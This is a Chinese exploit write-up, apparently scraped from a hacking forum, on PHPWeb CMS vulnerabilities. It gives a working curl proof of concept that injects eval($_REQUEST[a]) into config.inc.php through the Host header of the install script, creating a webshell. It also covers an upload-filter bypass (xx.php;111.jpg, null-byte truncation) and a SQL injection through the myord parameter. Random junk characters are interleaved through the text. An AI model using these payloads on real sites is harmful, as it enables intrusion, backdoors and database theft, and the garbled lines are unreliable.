phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

4 E' h) s- S+ {$ G3 w$ }" u8 m鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
5 B4 z" R# L% z; s% f: G: m. q7 I鸡肋2： 有一定安全常识的站长都会删掉 install 目录
. `, C9 |0 D: U$ G; L! B, v4 y
' [+ o. D3 T3 \) ]虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

9 s2 a( k- x7 v8 k3 F" @分析：
# K2 {- Y7 u+ w6 P# W9 f
# M+ S$ r  `% J8 R5 f1 n% D
$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
* ]0 B- O4 _  I- A: `
6 i3 O( b; A/ C7 I                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
: E7 o; s  y/ W) l' j' r$ d; E                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
) v8 s4 j4 [1 `- Q' M8 Q                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);

, s! f. ~6 x+ \                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^
' p- |1 m/ @" u& S; r- W1 L
poc：
& G: O4 P+ n, H6 w
?
1
+ j  D/ u/ A4 q+ o% I% ~curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
5 W/ t! j8 |& ?$ r2 X0 Q跟之前的 phpcms一样 需要远程数据库
7 p% C4 b( y' R
——————————————————–
2 N4 t% E7 z* E& n( B1 D- e4 w上传漏洞(需要进后台)：
漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用


& _% }8 r% N7 ~+ P; m/ }5 j<?php
    define("ROOTPATH", "../../");
    include(ROOTPATH."includes/admin.inc.php");
9 A5 |+ V* Q1 m5 o$ f# D6 H5 k    NeedAuth(0);
; V7 k2 a- y+ t$ B8 i: Y( l
7 `3 E+ q, ^) X; E    $dt=date("Ymd",time());
) W, P+ [' z% w& s- o    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
& X% w' ~/ F1 w4 }, E            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }
3 C0 P* E8 P6 ~% \9 ~
$ Q) O. }* D5 q    //文件保存目录路径
    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
    echo $save_path;
. T4 X( j; A  M7 R& i    //文件保存目录URL
' Y  a9 w) y9 F- U, ]    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

    //定义允许上传的文件扩展名
    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀
7 o; ]# y9 o: Q. |7 F* r2 B( f
    //最大文件大小
$ y" b2 c& d/ S! m$ @4 b$ [    $max_size = 1000000;
8 l' x2 U5 D( c
! R0 u. Q$ a4 j5 j1 l& z2 o5 {9 _    //更改目录权限
: F* @0 P/ v+ Y0 O9 ?* O    @mkdir($save_path, 0777);

) K1 m3 Z  y' ~; Y. R8 y: T, z+ U    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名
  O) F, {7 K0 Z9 C
    //文件URL
    $file_url = $save_url.$_POST['fileName'];
1 K" P  t3 I8 C7 u- B  {8 ^6 Q//有上传文件时
! P( ^8 K9 |9 ^    if (empty($_FILES) === false) {
- a/ p# C$ v( p0 P
            //原文件名
            $file_name = $_FILES['fileData']['name'];
5 p8 m7 ?6 O+ ?) \2 v1 j            //服务器上临时文件名
            $tmp_name = $_FILES['fileData']['tmp_name'];
            //文件大小
# ?7 V# s8 |- w# L. o  Z3 b            $file_size = $_FILES['fileData']['size'];
            //检查目录
* U  I* s  |9 X$ Z6 m; M            if (@is_dir($save_path) === false) {
. f0 X1 s$ Z7 j" f                    alert("上传目录不存在。");
            }
            //检查目录写权限
. p. u- G) r. x: q! {* c: S! B            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
            //检查是否已上传
$ t) @3 u1 S+ D( [" J            if (@is_uploaded_file($tmp_name) === false) {
! n& {; j% g( `' ^  Q# b5 E                    alert("临时文件可能不是上传文件。");
1 `) h, q: Z: ]  W  ?            }
( B+ \- J( D: i8 p. m( y  D            //检查文件大小
7 C4 U* U7 S) N9 G! t) H            if ($file_size > $max_size) {
6 C2 T( Y( e" p: X$ C# o3 c* y                    alert("上传文件大小超过限制。");
3 p4 |. o# p; w4 g) _            }
6 C3 G& P- z7 u3 Q; ~6 ~            //获得文件扩展名
            $temp_arr = explode(".", $_POST['fileName']);
# l7 _8 A" a- u! U5 V5 A8 |1 L            $file_ext = array_pop($temp_arr);
% _1 n5 O" T; M            $file_ext = trim($file_ext);
            $file_ext = strtolower($file_ext);

& @! P! E" c( G: [5 g            //检查扩展名   
" D' D# D0 k/ |6 i/ q. G- _            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
& w$ \& y( C' B! T* W! R* E8 s            }
5 E3 U9 E8 i; b6 g
# f- P/ X# f- S* g! V$ q  v            //移动文件   
            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
$ G+ x5 g( ]5 T/ |                    alert("上传文件失败。");
, i3 V. y- z: N7 C            }
9 g0 g" @: `# k$ Z# r, ]
8 j: a0 A$ s# A* N  W. |# d            @chmod($file_path,0666);

/ U+ \$ N+ z( v; [, w    ?>
% J( }: M; N: u3 h1 |7 w抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227

apache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

' W4 K8 v9 \1 E# f——————————————————
注入漏洞：
: B1 w9 I! ?2 g4 @- ~2 t$ @漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
. E) V, n4 M, m% w1 i

<?php
   //       ... 省略 n 行...
* _5 ]4 C$ n) \7 B7 E/ p   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
- }. I2 d2 n% v# X+ u, G& M3 |           $myord=htmlspecialchars($_GET["myord"]);
; q1 A! _9 H& L7 _1 p/ ~
   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
   //第47行 $key:
. b! Q3 H3 T5 b/ \- \7 r! P5 N
   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..
0 ?) w5 f0 H4 {( I2 J7 j
   //第197行 $myord
   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
$ Z, ~: u- B# R* I/ S
   ?>
  W( O4 O# p8 A: n